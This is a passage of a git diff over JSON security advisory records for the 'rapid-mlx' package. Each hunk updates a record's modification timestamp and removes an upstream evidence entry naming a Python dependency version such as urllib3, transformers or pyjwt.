"registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.1", - "key": "pkg:pypi/protobuf@7.36.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-50181.json b/advisories/BREW-rapid-mlx-CVE-2025-50181.json index c54eb9d1026..73e69031d4f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-50181.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-50181", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-50182.json b/advisories/BREW-rapid-mlx-CVE-2025-50182.json index 85454003b9b..0f020fcdb2f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-50182.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-50182", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-5197.json b/advisories/BREW-rapid-mlx-CVE-2025-5197.json index 1d7e109f907..d5382955211 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-5197.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-5197.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-5197", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-9356-575x-2w9m", "CVE-2025-5197", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-53365.json b/advisories/BREW-rapid-mlx-CVE-2025-53365.json index c0ee5b99d74..433b83c956c 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-53365.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-53365.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-53365", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-j975-95f5-7wqh", "CVE-2025-53365", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-53366.json b/advisories/BREW-rapid-mlx-CVE-2025-53366.json index 96e475e11ba..444e632cc5b 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-53366.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-53366.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-53366", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-3qhf-m339-9g5v", "CVE-2025-53366", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-54121.json b/advisories/BREW-rapid-mlx-CVE-2025-54121.json index fe6d9d5c701..1c2a32d7160 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-54121.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-54121.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-54121", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-2c2j-9gv5-cj73", "CVE-2025-54121", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-6051.json b/advisories/BREW-rapid-mlx-CVE-2025-6051.json index a425aaf6b37..de2bc3dd5f0 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-6051.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-6051.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-6051", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-rcv9-qm8p-9p6j", "CVE-2025-6051", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-62727.json b/advisories/BREW-rapid-mlx-CVE-2025-62727.json index 4cd79441f77..0e2e54a277e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-62727.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-62727.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-62727", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-7f5h-v6xp-fcq8", "CVE-2025-62727", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-6638.json b/advisories/BREW-rapid-mlx-CVE-2025-6638.json index 6964ca6decb..ee7634fce77 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-6638.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-6638.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-6638", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-59p9-h35m-wg4g", "CVE-2025-6638", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-66416.json b/advisories/BREW-rapid-mlx-CVE-2025-66416.json index 33ec0872d72..efd9527b5bd 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-66416.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-66416.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-66416", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-9h52-p55h-vw2f", "CVE-2025-66416", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-66418.json b/advisories/BREW-rapid-mlx-CVE-2025-66418.json index a47ba242181..1bc14b51fc4 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-66418.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-66418", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-66471.json b/advisories/BREW-rapid-mlx-CVE-2025-66471.json index 22c456ab420..dbd198948c9 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-66471.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-66471", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-68146.json b/advisories/BREW-rapid-mlx-CVE-2025-68146.json index facb55cf076..52378b9feb5 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-68146.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-68146", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:32Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.5", - "key": "pkg:pypi/filelock@3.32.5", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2025-6921.json b/advisories/BREW-rapid-mlx-CVE-2025-6921.json index 10a357c9cd4..4d2edcc4845 100644 --- a/advisories/BREW-rapid-mlx-CVE-2025-6921.json +++ b/advisories/BREW-rapid-mlx-CVE-2025-6921.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2025-6921", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-4w7r-h757-3r74", "CVE-2025-6921", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-0994.json b/advisories/BREW-rapid-mlx-CVE-2026-0994.json index 76299f3546c..093ccc38808 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-0994.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-0994.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-0994", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-7gcm-g887-7qv7", "CVE-2026-0994", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.1", - "key": "pkg:pypi/protobuf@7.36.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-1260.json b/advisories/BREW-rapid-mlx-CVE-2026-1260.json index 8ae7b9ace1f..791431a350f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-1260.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-1260.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-1260", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-38vq-g6vr-w8wf", "CVE-2026-1260", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "sentencepiece", - "subject_version": "0.2.2", - "key": "pkg:pypi/sentencepiece@0.2.2", - "resource": "sentencepiece" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-1839.json b/advisories/BREW-rapid-mlx-CVE-2026-1839.json index 7a8dadb94bb..697db517164 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-1839.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-1839.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-1839", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-69w3-r845-3855", "CVE-2026-1839", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-21441.json b/advisories/BREW-rapid-mlx-CVE-2026-21441.json index 3015ef6107b..688629f739a 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-21441.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-21441", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-22701.json b/advisories/BREW-rapid-mlx-CVE-2026-22701.json index 14da9d44e07..73af5c47914 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-22701.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-22701", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:32Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.5", - "key": "pkg:pypi/filelock@3.32.5", - "resource": "filelock" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-24486.json b/advisories/BREW-rapid-mlx-CVE-2026-24486.json index e2583805204..f260d583ddb 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-24486.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-24486.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-24486", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-wp53-j4wj-2cfg", "CVE-2026-24486", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-25645.json b/advisories/BREW-rapid-mlx-CVE-2026-25645.json index b3580b97510..7eb8d1475b8 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-25645.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-25645", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-32597.json b/advisories/BREW-rapid-mlx-CVE-2026-32597.json index 18a56929fca..63ab3771681 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-32597.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-32597.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-32597", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-752w-5fwx-jx9f", "CVE-2026-32597", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-40347.json b/advisories/BREW-rapid-mlx-CVE-2026-40347.json index fd58631c352..2665341ef73 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-40347.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-40347.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-40347", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-mj87-hwqh-73pj", "CVE-2026-40347", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-42561.json b/advisories/BREW-rapid-mlx-CVE-2026-42561.json index 65bd4052072..ca56c286aeb 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-42561.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-42561.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-42561", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-pp6c-gr5w-3c5g", "CVE-2026-42561", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-4372.json b/advisories/BREW-rapid-mlx-CVE-2026-4372.json index b874a632a36..cfcdbb0b659 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-4372.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-4372.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-4372", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-29pf-2h5f-8g72", "CVE-2026-4372", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-44431.json b/advisories/BREW-rapid-mlx-CVE-2026-44431.json index 1f4b710a480..47845dcf6cf 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-44431.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-44431", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-44432.json b/advisories/BREW-rapid-mlx-CVE-2026-44432.json index 0a93ad6b312..0cd909ef78c 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-44432.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-44432", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-4539.json b/advisories/BREW-rapid-mlx-CVE-2026-4539.json index 3eaca11838a..4786407d269 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-4539.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-4539", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-45409.json b/advisories/BREW-rapid-mlx-CVE-2026-45409.json index 9acce80cd66..f6176d99028 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-45409.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-45409", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48522.json b/advisories/BREW-rapid-mlx-CVE-2026-48522.json index 6fb46e09e6f..6012a6f01ac 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48522.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48522.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48522", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-993g-76c3-p5m4", "CVE-2026-48522", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48523.json b/advisories/BREW-rapid-mlx-CVE-2026-48523.json index d34953d7a4f..9354be84996 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48523.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48523.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48523", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jq35-7prp-9v3f", "CVE-2026-48523", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48524.json b/advisories/BREW-rapid-mlx-CVE-2026-48524.json index 7f2166f3454..a283f93e57f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48524.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48524.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48524", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-fhv5-28vv-h8m8", "CVE-2026-48524", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48525.json b/advisories/BREW-rapid-mlx-CVE-2026-48525.json index 6053891c0da..4a0eb4163a5 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48525.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48525", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-w7vc-732c-9m39", "CVE-2026-48525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - 